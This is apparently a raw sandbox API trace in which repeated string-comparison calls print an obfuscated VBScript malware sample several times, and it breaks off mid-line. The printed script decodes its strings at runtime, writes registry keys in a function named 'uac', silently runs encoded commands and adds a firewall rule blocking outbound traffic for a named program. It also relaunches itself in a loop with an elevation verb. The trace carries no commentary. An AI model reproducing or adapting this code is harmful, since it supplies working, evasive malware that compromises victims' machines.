bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.999] wcsncmp (_String1="\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.999] wcsncmp (_String1="for each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0222.999] wcsncmp (_String1="or each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.999] wcsncmp (_String1="r each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.000] wcsncmp (_String1=" each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 